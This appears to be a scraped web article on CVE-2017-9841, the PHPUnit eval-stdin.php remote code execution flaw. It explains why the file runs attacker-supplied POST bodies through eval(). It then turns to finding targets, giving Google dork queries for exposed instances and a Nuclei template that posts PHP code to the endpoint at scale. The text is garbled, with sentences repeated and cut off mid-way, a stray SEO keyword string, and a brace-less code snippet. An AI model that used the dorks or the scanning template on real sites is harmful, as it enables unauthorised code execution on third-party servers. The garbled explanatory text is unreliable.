The vulnerability exists because EvalStdin.php accepts input from the HTTP request body (standard input) and executes it without authentication or authorization checks.
This file is part of PHPUnit (a testing framework for PHP). It allows arbitrary PHP code execution via standard input when accessed directly, if not properly restricted.
The file was designed to be invoked internally by PHPUnit’s test runners. It was never intended to be called directly by an end-user. However, the script lacks a "guard clause" (e.g., if (!defined('PHPUNIT_TESTING')) die();). index of vendor phpunit phpunit src util php evalstdinphp
Consequently, if the web server (Apache, Nginx, IIS) is configured to serve files inside the vendor directory, an attacker can request this URL. The PHP interpreter loads the file, reads the attacker's POST body via php://input, and passes it directly to the dangerous eval() function.
The file EvalStdin.php is a utility class used by PHPUnit internally. Its legitimate purpose is to facilitate the execution of test cases by reading PHP code from the standard input (STDIN) and evaluating it within an isolated process. The vulnerability exists because EvalStdin
The file typically contains logic similar to this simplified snippet:
// Simplified representation of the vulnerable logic
if (defined('STDIN'))
$code = stream_get_contents(STDIN);
eval($code);
This functionality is designed to help developers run isolated unit tests, but the use of eval() is inherently dangerous if the input is not strictly controlled. This functionality is designed to help developers run
Exploiting this vulnerability is trivial and requires no authentication or sophisticated exploit chains.
Use Google Dorks, GitHub code search, or custom crawlers to find exposed instances:
Google Dorks:
intitle:"index of" "vendor/phpunit/phpunit/src/Util/PHP"
intitle:"index of" "eval-stdin.php"
Mass scanning with Nuclei:
id: CVE-2017-9841
info:
name: PHPUnit eval-stdin.php RCE
requests:
- method: POST
path:
- "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
body: "<?php echo md5('test'); ?>"
matchers:
- type: word
words:
- "098f6bcd4621d373cade4e832627b4f6"